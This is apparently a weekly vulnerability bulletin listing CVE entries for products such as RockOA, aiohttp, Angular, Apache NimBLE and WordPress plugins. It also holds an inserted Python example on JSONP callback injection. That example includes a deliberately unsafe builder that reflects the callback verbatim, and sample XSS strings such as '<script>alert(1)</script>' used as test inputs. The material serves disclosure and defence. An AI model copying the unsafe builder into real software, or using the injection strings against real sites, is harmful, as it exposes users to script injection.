| Xinhu--Rainrock RockOA | A security flaw has been discovered in Xinhu Rainrock RockOA up to 2.7.1. Affected is an unknown function of the file rock_page_gong.php of the component Cover Image Handler. The manipulation of the argument fengmian results in cross site scripting. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 3.5 | CVE-2026-0587 | VDB-339493 \| Xinhu Rainrock RockOA Cover Image rock_page_gong.php cross site scripting VDB-339493 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #725384 \| Xinhu Xinhu OA V2.7.1 (earlier versions may also be affected) Stored Cross-Site Scripting (XSS) |
| Xinhu--Rainrock RockOA | A weakness has been identified in Xinhu Rainrock RockOA up to 2.7.1. Affected by this vulnerability is an unknown functionality of the file rockfun.php of the component API. Manipulation of the argument callback (a JSONP callback parameter reflected into the script response) causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 3.5 | CVE-2026-0588 | VDB-339494 \| Xinhu Rainrock RockOA API rockfun.php cross site scripting VDB-339494 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #725397 \| Xinhu Xinhu OA V2.7.1 JSONP Injection |
| xnx3--wangmarket | A security flaw has been discovered in xnx3 wangmarket up to 4.9. Affected by this issue is some unknown functionality of the file /admin/system/variableSave.do of the component System Variables Page. Performing a manipulation of the argument Description results in cross site scripting. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 2.4 | CVE-2025-15451 | VDB-339484 \| xnx3 wangmarket System Variables variableSave.do cross site scripting VDB-339484 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #724838 \| https://github.com/xnx3/wangmarket wangmarket 4.9 Improper Neutralization of Alternate XSS Syntax https://www.yuque.com/cocount-eveo/lu0220/eg6s9gropfwtoz9w?singleDoc |
| xnx3--wangmarket | A weakness has been identified in xnx3 wangmarket up to 4.9. This affects the function variableList of the file /admin/system/variableList.do of the component Backend Variable Search. Executing a manipulation of the argument Description can lead to cross site scripting. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 2.4 | CVE-2025-15452 | VDB-339485 \| xnx3 wangmarket Backend Variable Search variableList.do variableList cross site scripting VDB-339485 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #724840 \| https://github.com/xnx3/wangmarket wangmarket 4.9 Improper Neutralization of Alternate XSS Syntax https://www.yuque.com/cocount-eveo/lu0220/flbu025pfmwgudmg?singleDoc |
| zhanglun--lettura | A vulnerability was detected in zhanglun lettura up to 0.1.22. This issue affects some unknown processing of the file src/components/ArticleView/ContentRender.tsx of the component RSS Handler. The manipulation results in cross site scripting. The attack can be executed remotely. This attack is characterized by high complexity. The exploitability is assessed as difficult. The exploit is now public and may be used. The patch is identified as 67213093db9923e828a6e3fd8696a998c85da2d4. It is best practice to apply a patch to resolve this issue. | 2026-01-05 | 3.1 | CVE-2025-15454 | VDB-339487 \| zhanglun lettura RSS ContentRender.tsx cross site scripting VDB-339487 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #725038 \| lettura v0.1.22 XSS https://gist.github.com/youremailaddress/cba7c19a4eafcb326d0e912adf132be3 https://gist.github.com/youremailaddress/cba7c19a4eafcb326d0e912adf132be3#proof-of-concept https://github.com/zhanglun/lettura/commit/67213093db9923e828a6e3fd8696a998c85da2d4 |
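
The RockOA rockfun.php entry above is an instance of JSONP callback injection: the endpoint reflects the `callback` query parameter into a script response, so a value that is not a plain identifier becomes attacker-controlled page content. The following is an added example written for this bulletin, not RockOA's code; the endpoint shape (a `callback` parameter wrapped around a JSON object) is assumed. It places an unfiltered builder beside one that allow-lists the callback as a dotted JavaScript identifier, escapes the JSON for script context, and labels the response so browsers never render it as HTML.

```python
"""Illustrative example for this bulletin (not RockOA's code): validating a
JSONP callback parameter instead of reflecting it."""
import json
import re

# Allow-list: a dotted JavaScript identifier, the only shape a legitimate
# JSONP client (e.g. jQuery's generated "jQuery123_456") ever needs.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*")


def valid_callback(callback: str) -> bool:
    return CALLBACK_RE.fullmatch(callback) is not None


def jsonp_unsafe(callback: str, data: dict) -> tuple[str, dict]:
    """Reflects the callback verbatim and serves it as HTML: whatever sits in
    the query string ends up in a document the browser will render."""
    body = f"{callback}({json.dumps(data)});"
    return body, {"Content-Type": "text/html; charset=utf-8"}


def jsonp_safe(callback: str, data: dict) -> tuple[str, dict]:
    """Rejects anything that is not a dotted identifier, escapes <, > and &
    inside the JSON (the \\uXXXX form is valid JSON and valid JS), prefixes
    a comment to spoil content sniffing, and labels the body as JavaScript
    with sniffing disabled so it is never interpreted as HTML."""
    if not valid_callback(callback):
        raise ValueError("invalid JSONP callback")
    payload = (json.dumps(data)
               .replace("<", "\\u003c")
               .replace(">", "\\u003e")
               .replace("&", "\\u0026"))
    body = f"/**/{callback}({payload});"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return body, headers


def rejects(callback: str) -> bool:
    """True when the hardened builder refuses the callback."""
    try:
        jsonp_safe(callback, {})
    except ValueError:
        return True
    return False


def triage(callbacks) -> dict:
    """Map each callback value to 'accepted' or 'rejected'."""
    return {cb: ("accepted" if valid_callback(cb) else "rejected")
            for cb in callbacks}


if __name__ == "__main__":
    # Constructed sample values: two realistic callbacks, then injection attempts.
    samples = ["jQuery123_456", "app.handlers.done",
               "alert(1)//", "<script>alert(1)</script>", "a;b", ""]
    for cb, verdict in triage(samples).items():
        print(f"{verdict:>8}: {cb!r}")
    print(jsonp_unsafe(samples[2], {"ok": True})[0])
    print(jsonp_safe(samples[1], {"ok": True, "x": "</script>"})[0])
```

The allow-list is the essential control; the content type, `nosniff` header and comment prefix are defence in depth for the case where the response is opened directly in a browser. The same regex is a reasonable check to run over web server logs for a JSONP endpoint: any `callback` value that fails it is an injection attempt.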
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| _nK--nK Themes Helper | Server-Side Request Forgery (SSRF) vulnerability in _nK nK Themes Helper nk-themes-helper allows Server Side Request Forgery. This issue affects nK Themes Helper: from n/a through <= 1.7.9. | 2026-01-08 | not yet calculated | CVE-2025-22726 | https://vdp.patchstack.com/database/Wordpress/Plugin/nk-themes-helper/vulnerability/wordpress-nk-themes-helper-plugin-1-7-9-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| ACCESSALLY, INC.--AccessAlly | AccessAlly WordPress plugin versions prior to 3.3.2 contain an unauthenticated arbitrary PHP code execution vulnerability in the Login Widget. The plugin processes the login_error parameter as PHP code, allowing an attacker to supply and execute arbitrary PHP in the context of the WordPress web server process, resulting in remote code execution. | 2026-01-09 | not yet calculated | CVE-2020-36875 | https://accessally.com/software-release/accessally-3-3-2/ https://wpscan.com/vulnerability/c644de6d-098d-4889-b75d-53fd2b89ff4d/ https://www.vulncheck.com/advisories/accessally-unauthenticated-arbitrary-php-code-execution |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below of the Python HTTP parser may allow a request smuggling attack with the presence of non-ASCII characters. If a pure Python version of AIOHTTP is installed (i.e. without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69224 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-69f9-5gxw-wvc2 https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below contain parser logic which allows non-ASCII decimals to be present in the Range header. There is no known impact, but there is the possibility that there's a method to exploit a request smuggling vulnerability. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69225 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mqqc-3gqh-h2x8 https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below enable an attacker to ascertain the existence of absolute path components through the path normalization logic for static files meant to prevent path traversal. If an application uses web.static() (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69226 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76 https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow for an infinite loop to occur when assert statements are bypassed, resulting in a DoS attack when processing a POST body. If optimizations are enabled (-O or PYTHONOPTIMIZE=1), and the application includes a handler that uses the Request.post() method, then an attacker may be able to execute a DoS attack with a specially crafted message. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69227 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jj3x-wxrx-4x23 https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a request to be crafted in such a way that an AIOHTTP server's memory fills up uncontrollably during processing. If an application includes a handler that uses the Request.post() method, an attacker may be able to freeze the server by exhausting the memory. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69228 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6jhg-hg63-jvvf https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. In versions 3.13.2 and below, handling of chunked messages can result in excessive blocking CPU usage when receiving a large number of chunks. If an application makes use of the request.read() method in an endpoint, it may be possible for an attacker to cause the server to spend a moderate amount of blocking CPU time (e.g. 1 second) while processing the request. This could potentially lead to DoS as the server would be unable to handle other requests during that time. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69229 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g84x-mcqj-x9qq https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229 https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. In versions 3.13.2 and below, reading multiple invalid cookies can lead to a logging storm. If the cookies attribute is accessed in an application, then an attacker may be able to trigger a storm of warning-level logs using a specially crafted Cookie header. This issue is fixed in 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69230 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-fh55-r93g-j68g https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326 |
| AirVPN--Eddie | AirVPN Eddie on macOS contains an insecure XPC service that allows local, unprivileged users to escalate their privileges to root. This issue affects Eddie: 2.24.6. | 2026-01-06 | not yet calculated | CVE-2025-14979 | https://fluidattacks.com/advisories/blink182 https://eddie.website/ https://github.com/AirVPN/Eddie |
| AITpro--BulletProof Security | Insertion of Sensitive Information Into Sent Data vulnerability in AITpro BulletProof Security bulletproof-security allows Retrieve Embedded Sensitive Data. This issue affects BulletProof Security: from n/a through <= 6.9. | 2026-01-08 | not yet calculated | CVE-2025-67931 | https://vdp.patchstack.com/database/Wordpress/Plugin/bulletproof-security/vulnerability/wordpress-bulletproof-security-plugin-6-9-sensitive-data-exposure-vulnerability?_s_id=cve |
| AmentoTech--Workreap (theme's plugin) | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AmentoTech Workreap (theme's plugin) workreap allows SQL Injection.This issue affects Workreap (theme's plugin): from n/a through <= 3.3.6. | 2026-01-08 | not yet calculated | CVE-2025-22728 | https://vdp.patchstack.com/database/Wordpress/Plugin/workreap/vulnerability/wordpress-workreap-theme-s-plugin-plugin-3-3-6-sql-injection-vulnerability?_s_id=cve |
| angular--angular | Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0, a cross-site scripting (XSS) vulnerability has been identified in the Angular Template Compiler. The vulnerability exists because Angular's internal sanitization schema fails to recognize the href and xlink:href attributes of SVG <script> elements as a Resource URL context. This issue has been patched in versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0. | 2026-01-10 | not yet calculated | CVE-2026-22610 | https://github.com/angular/angular/security/advisories/GHSA-jrmj-c5cx-3cw6 https://github.com/angular/angular/pull/66318 https://github.com/angular/angular/commit/91dc91bae4a1bbefc58bef6ef739d0e02ab44d56 |
| anibalwainstein--Effect Maker | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anibalwainstein Effect Maker effect-maker allows DOM-Based XSS. This issue affects Effect Maker: from n/a through <= 1.2.1. | 2026-01-08 | not yet calculated | CVE-2025-68867 | https://vdp.patchstack.com/database/Wordpress/Plugin/effect-maker/vulnerability/wordpress-effect-maker-plugin-1-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Anthropic--MCP TypeScript SDK | Anthropic's MCP TypeScript SDK versions up to and including 1.25.1 contain a regular expression denial of service (ReDoS) vulnerability in the UriTemplate class when processing RFC 6570 exploded array patterns. The dynamically generated regular expression used during URI matching contains nested quantifiers that can trigger catastrophic backtracking on specially crafted inputs, resulting in excessive CPU consumption. An attacker can exploit this by supplying a malicious URI that causes the Node.js process to become unresponsive, leading to a denial of service. | 2026-01-05 | not yet calculated | CVE-2026-0621 | https://github.com/modelcontextprotocol/typescript-sdk/issues/965 https://www.vulncheck.com/advisories/mcp-typescript-sdk-uritemplate-exploded-array-pattern-redos |
| Apache Software Foundation--Apache Kyuubi | Any client that can access Apache Kyuubi Server via the Kyuubi frontend protocols can bypass the server-side config kyuubi.session.local.dir.allow.list and use local files that are not listed in the config. This issue affects Apache Kyuubi: from 1.6.0 through 1.10.2. Users are recommended to upgrade to version 1.10.3 or later, which fixes the issue. | 2026-01-05 | not yet calculated | CVE-2025-66518 | https://lists.apache.org/thread/xp460bwbyzdhho34ljd4nchyt2fmhodl |
| Apache Software Foundation--Apache Mynewt NimBLE | J2EE Misconfiguration: Data Transmission Without Encryption vulnerability in Apache NimBLE. Improper handling of the Pause Encryption procedure on the Link Layer results in a previously encrypted connection being left in an unencrypted state, allowing an eavesdropper to observe the remainder of the exchange. This issue affects Apache NimBLE: through <= 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue. | 2026-01-10 | not yet calculated | CVE-2025-52435 | https://github.com/apache/mynewt-nimble/commit/164f1c23c18a290908df76ed83fe848bfe4a4903 https://github.com/apache/mynewt-nimble/commit/ec3d75e909fa6dcadf1836fefc4432794a673d18 https://lists.apache.org/thread/ow8dzpsqfh9llfclh5fzh6z237brzc0s |
| Apache Software Foundation--Apache Mynewt NimBLE | Out-of-bounds Read vulnerability in the Apache NimBLE HCI H4 driver. A specially crafted HCI event could lead to an invalid memory read in the H4 driver. This issue affects Apache NimBLE: through 1.8. This issue requires a broken or bogus Bluetooth controller and thus severity is considered low. Users are recommended to upgrade to version 1.9, which fixes the issue. | 2026-01-10 | not yet calculated | CVE-2025-53470 | https://github.com/apache/mynewt-nimble/commit/b973df0c6cf7b30efbf8eb2cafdc1ee843464b76 https://lists.apache.org/thread/32sm0944dyod4sdql77stgyw9xb2msc0 |
| Apache Software Foundation--Apache Mynewt NimBLE | NULL Pointer Dereference vulnerability in Apache NimBLE. Missing validation of HCI connection complete or HCI command TX buffer could lead to a NULL pointer dereference. This issue requires disabled asserts and a broken or bogus Bluetooth controller and thus severity is considered low. This issue affects Apache NimBLE: through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue. | 2026-01-10 | not yet calculated | CVE-2025-53477 | https://github.com/apache/mynewt-nimble/commit/0caf9baeb271ede85fcc5237ab87ddbf938600da https://github.com/apache/mynewt-nimble/commit/3160b8c4c7ff8db4e0f9badcdf7df684b151e077 https://lists.apache.org/thread/1dxthc132hwm2tzvjblrtnschcsbw2vo |
| Apache Software Foundation--Apache Mynewt NimBLE | Authentication Bypass by Spoofing vulnerability in Apache NimBLE. Receiving a specially crafted Security Request could lead to removal of the original bond and re-bonding with an impostor. This issue affects Apache NimBLE: through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue. | 2026-01-10 | not yet calculated | CVE-2025-62235 | https://github.com/apache/mynewt-nimble/commit/41f67e391e788c5feef9030026cc5cbc5431838a https://lists.apache.org/thread/rw2mrpfwb9d9wmq4h4b6ctcd6gpkk2ho |
| Apache Software Foundation--Apache SIS | Improper Restriction of XML External Entity Reference vulnerability in Apache SIS. It is possible to write XML files in such a way that, when parsed by Apache SIS, an XML file reveals to the attacker the content of a local file on the server running Apache SIS. This vulnerability impacts the following SIS services: * Reading of GeoTIFF files having the GEO_METADATA tag defined by the Defense Geospatial Information Working Group (DGIWG). * Parsing of ISO 19115 metadata in XML format. * Parsing of Coordinate Reference Systems defined in the GML format. * Parsing of files in GPS Exchange Format (GPX). This issue affects Apache SIS from versions 0.4 through 1.5 inclusive. Users are recommended to upgrade to version 1.6, which will fix the issue. In the meantime, the security vulnerability can be avoided by launching Java with the javax.xml.accessExternalDTD system property set to a comma-separated list of authorized protocols. For example: java -Djavax.xml.accessExternalDTD="" ... | 2026-01-05 | not yet calculated | CVE-2025-68280 | https://lists.apache.org/thread/s4ggy3zbtrrn93glgo2vn52lgcxk4bp4 |
| Apache Software Foundation--Apache Struts | Missing XML Validation vulnerability in Apache Struts. This issue affects Apache Struts: from 2.0.0 before 2.2.1; Apache Struts: from 2.2.1 through 6.1.0. Users are recommended to upgrade to version 6.1.1, which fixes the issue. | 2026-01-11 | not yet calculated | CVE-2025-68493 | https://cwiki.apache.org/confluence/display/WW/S2-069 |
| Apache Software Foundation--Apache Uniffle | The Uniffle HTTP client is configured to trust all SSL certificates and disables hostname verification by default. This insecure configuration exposes all REST API communication between the Uniffle CLI/client and the Uniffle Coordinator service to potential Man-in-the-Middle (MITM) attacks. This issue affects all versions before 0.10.0. Users are recommended to upgrade to version 0.10.0, which fixes the issue. | 2026-01-07 | not yet calculated | CVE-2025-68637 | https://lists.apache.org/thread/trvdd11hmpbjno3t8rc9okr4t036ox2v |
| Apple--iOS and iPadOS | A logic issue was addressed with improved validation. This issue is fixed in iOS 26.2 and iPadOS 26.2. Restoring from a backup may prevent a passcode from being required immediately after Face ID enrollment. | 2026-01-09 | not yet calculated | CVE-2025-46286 | https://support.apple.com/en-us/125884 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.2. An app may be able to access protected files within an App Sandbox container. | 2026-01-09 | not yet calculated | CVE-2025-46297 | https://support.apple.com/en-us/125886 |
| Apple--tvOS | The issue was addressed with improved memory handling. This issue is fixed in tvOS 26.2, Safari 26.2, watchOS 26.2, visionOS 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2026-01-09 | not yet calculated | CVE-2025-46298 | https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--tvOS | A memory initialization issue was addressed with improved memory handling. This issue is fixed in tvOS 26.2, Safari 26.2, watchOS 26.2, visionOS 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2. Processing maliciously crafted web content may disclose internal states of the app. | 2026-01-09 | not yet calculated | CVE-2025-46299 | https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| armurox--loggingredactor | Logging Redactor is a Python library designed to redact sensitive data in logs based on regex patterns and / or dictionary keys. Prior to version 0.0.6, non-string types are converted into string types, leading to type errors in %d conversions. The problem has been patched in version 0.0.6. No known workarounds are available. | 2026-01-08 | not yet calculated | CVE-2026-22041 | https://github.com/armurox/loggingredactor/security/advisories/GHSA-rvjx-cfjh-5mc9 https://github.com/armurox/loggingredactor/issues/7 https://github.com/armurox/loggingredactor/releases/tag/0.0.6 |
| Arraytics--Timetics | Authentication Bypass Using an Alternate Path or Channel vulnerability in Arraytics Timetics timetics allows Authentication Abuse. This issue affects Timetics: from n/a through <= 1.0.46. | 2026-01-08 | not yet calculated | CVE-2025-67915 | https://vdp.patchstack.com/database/Wordpress/Plugin/timetics/vulnerability/wordpress-timetics-plugin-1-0-46-broken-authentication-vulnerability?_s_id=cve |
| Aruba.it Dev--Aruba HiSpeed Cache | Missing Authorization vulnerability in Aruba.it Dev Aruba HiSpeed Cache aruba-hispeed-cache allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Aruba HiSpeed Cache: from n/a through < 3.0.3. | 2026-01-08 | not yet calculated | CVE-2025-67913 | https://vdp.patchstack.com/database/Wordpress/Plugin/aruba-hispeed-cache/vulnerability/wordpress-aruba-hispeed-cache-plugin-3-0-3-broken-access-control-vulnerability?_s_id=cve |
| Asseco--AMDX | The Asseco ADMX system is used for processing medical records. It allows logged-in users to access medical files belonging to other users through manipulation of GET arguments containing document IDs. This issue has been fixed in ADMX version 6.09.01.62. | 2026-01-08 | not yet calculated | CVE-2025-4596 | https://cert.pl/en/posts/2026/01/CVE-2025-4596 |
| Asseco--InfoMedica Plus | Asseco InfoMedica is a comprehensive solution used to manage both administrative and medical tasks in the healthcare sector. A low-privileged user is able to obtain the encoded passwords of all other accounts (including the main administrator) due to a lack of granularity in access control. Chained exploitation of this vulnerability and CVE-2025-8307 allows an attacker to escalate privileges. This vulnerability has been fixed in versions 4.50.1 and 5.38.0. | 2026-01-08 | not yet calculated | CVE-2025-8306 | https://cert.pl/en/posts/2026/01/CVE-2025-8306/ |
| Asseco--InfoMedica Plus | Asseco InfoMedica is a comprehensive solution used to manage both administrative and medical tasks in the healthcare sector. Passwords of all users are stored in a database in an encoded format. An attacker in possession of these encoded passwords is able to decode them by using an algorithm embedded in the client-side part of the software. This vulnerability has been fixed in versions 4.50.1 and 5.38.0. | 2026-01-08 | not yet calculated | CVE-2025-8307 | https://cert.pl/en/posts/2026/01/CVE-2025-8306/ |
| Astoundify--Jobify | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Astoundify Jobify jobify allows Reflected XSS. This issue affects Jobify: from n/a through <= 4.3.0. | 2026-01-08 | not yet calculated | CVE-2025-67916 | https://vdp.patchstack.com/database/Wordpress/Theme/jobify/vulnerability/wordpress-jobify-theme-4-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ASUS--ASCI | An uncontrolled DLL loading path vulnerability exists in AsusSoftwareManagerAgent. A local attacker may influence the application to load a DLL from an attacker-controlled location, potentially resulting in arbitrary code execution. Refer to the 'Security Update for MyASUS' section of the ASUS Security Advisory for more information. | 2026-01-06 | not yet calculated | CVE-2025-12793 | https://www.asus.com/security-advisory |
| AuntyFey--AuntyFey Smart Combination Lock | AuntyFey Smart Combination Lock firmware versions as of 2025-12-24 contain a vulnerability that allows an unauthenticated attacker within Bluetooth Low Energy (BLE) range to cause a denial of service by repeatedly initiating BLE connections. Sustained connection attempts interrupt keypad authentication input and repeatedly force the device into lockout states, preventing legitimate users from unlocking the device. | 2026-01-07 | not yet calculated | CVE-2025-15474 | https://github.com/nsm-barii/ble-smartlock-dos https://www.amazon.com/dp/B0F9L1M4XG https://www.vulncheck.com/advisories/auntyfey-smart-combination-lock-ble-connection-flood-dos |
| badkeys--badkeys | badkeys is a tool and library for checking cryptographic public keys for known vulnerabilities. In versions 0.0.15 and below, an attacker may inject content with ASCII control characters like vertical tabs, ANSI escape sequences, etc., that can create misleading output of the badkeys command-line tool. This impacts scanning DKIM keys (both --dkim and --dkim-dns), SSH keys (--ssh-lines mode), and filenames in various modes. This issue is fixed in version 0.0.16. | 2026-01-05 | not yet calculated | CVE-2026-21439 | https://github.com/badkeys/badkeys/security/advisories/GHSA-wjpc-4f29-83h3 https://github.com/badkeys/badkeys/issues/40 https://github.com/badkeys/badkeys/commit/635a2f3b1b50a895d8b09ec8629efc06189f349a https://github.com/badkeys/badkeys/commit/de631f69f040974bb5fb442cdab9a1d904c64087 |
| BBR Plugins--Better Business Reviews | Missing Authorization vulnerability in BBR Plugins Better Business Reviews better-business-reviews allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Better Business Reviews: from n/a through <= 0.1.1. | 2026-01-06 | not yet calculated | CVE-2025-69354 | https://vdp.patchstack.com/database/Wordpress/Plugin/better-business-reviews/vulnerability/wordpress-better-business-reviews-plugin-0-1-1-broken-access-control-vulnerability?_s_id=cve |
| bdthemes--Ultimate Store Kit Elementor Addons | Missing Authorization vulnerability in bdthemes Ultimate Store Kit Elementor Addons ultimate-store-kit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ultimate Store Kit Elementor Addons: from n/a through <= 2.9.4. | 2026-01-06 | not yet calculated | CVE-2025-69336 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-store-kit/vulnerability/wordpress-ultimate-store-kit-elementor-addons-plugin-2-9-4-broken-access-control-vulnerability?_s_id=cve |
| BeeS Software Solutions--BET ePortal | BeeS Software Solutions BET Portal contains an SQL injection vulnerability in the login functionality of affected sites. The vulnerability enables arbitrary SQL commands to be executed on the backend database. | 2026-01-09 | not yet calculated | CVE-2025-14598 | https://cloudilyaerp.com/ https://afnaan.me/cve/cve-2025-14598 https://github.com/Afnaan-Ahmed/CVE-2025-14598 |
| beeteam368--VidMov | Path Traversal: '.../...//' vulnerability in beeteam368 VidMov vidmov allows Path Traversal. This issue affects VidMov: from n/a through <= 2.3.8. | 2026-01-08 | not yet calculated | CVE-2025-67914 | https://vdp.patchstack.com/database/Wordpress/Theme/vidmov/vulnerability/wordpress-vidmov-theme-2-3-8-path-traversal-vulnerability?_s_id=cve |
| bokeh--bokeh | Bokeh is an interactive visualization library written in Python. In versions 3.8.1 and below, if a server is configured with an allowlist (e.g., dashboard.corp), an attacker can register a domain like dashboard.corp.attacker.com (or use a subdomain if applicable) and lure a victim to visit it. The malicious site can then initiate a WebSocket connection to the vulnerable Bokeh server. Since the Origin header (e.g., http://dashboard.corp.attacker.com/) matches the allowlist according to the flawed logic, the connection is accepted. Once connected, the attacker can interact with the Bokeh server on behalf of the victim, potentially accessing sensitive data, or modifying visualizations. This issue is fixed in version 3.8.2. | 2026-01-08 | not yet calculated | CVE-2026-21883 | https://github.com/bokeh/bokeh/security/advisories/GHSA-793v-589g-574v https://github.com/bokeh/bokeh/commit/cedd113b0e271b439dce768671685cf5f861812e |
| BoldGrid--Post and Page Builder by BoldGrid | Missing Authorization vulnerability in BoldGrid Post and Page Builder by BoldGrid post-and-page-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Post and Page Builder by BoldGrid: from n/a through <= 1.27.9. | 2026-01-06 | not yet calculated | CVE-2025-69345 | https://vdp.patchstack.com/database/Wordpress/Plugin/post-and-page-builder/vulnerability/wordpress-post-and-page-builder-by-boldgrid-plugin-1-27-9-broken-access-control-vulnerability?_s_id=cve |
| brandexponents--Oshine | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in brandexponents Oshine oshin allows PHP Local File Inclusion. This issue affects Oshine: from n/a through <= 7.2.7. | 2026-01-08 | not yet calculated | CVE-2025-14359 | https://vdp.patchstack.com/database/Wordpress/Theme/oshin/vulnerability/wordpress-oshine-theme-7-2-7-local-file-inclusion-vulnerability?_s_id=cve |
| BuddhaThemes--WeDesignTech Ultimate Booking Addon | Missing Authorization vulnerability in BuddhaThemes WeDesignTech Ultimate Booking Addon wedesigntech-ultimate-booking-addon allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WeDesignTech Ultimate Booking Addon: from n/a through <= 1.0.3. | 2026-01-06 | not yet calculated | CVE-2025-69341 | https://vdp.patchstack.com/database/Wordpress/Plugin/wedesigntech-ultimate-booking-addon/vulnerability/wordpress-wedesigntech-ultimate-booking-addon-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve |
| Campaign Monitor--Campaign Monitor for WordPress | Missing Authorization vulnerability in Campaign Monitor Campaign Monitor for WordPress forms-for-campaign-monitor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Campaign Monitor for WordPress: from n/a through <= 2.9.0. | 2026-01-08 | not yet calculated | CVE-2026-0674 | https://vdp.patchstack.com/database/Wordpress/Plugin/forms-for-campaign-monitor/vulnerability/wordpress-campaign-monitor-for-wordpress-plugin-2-9-0-broken-access-control-vulnerability?_s_id=cve |
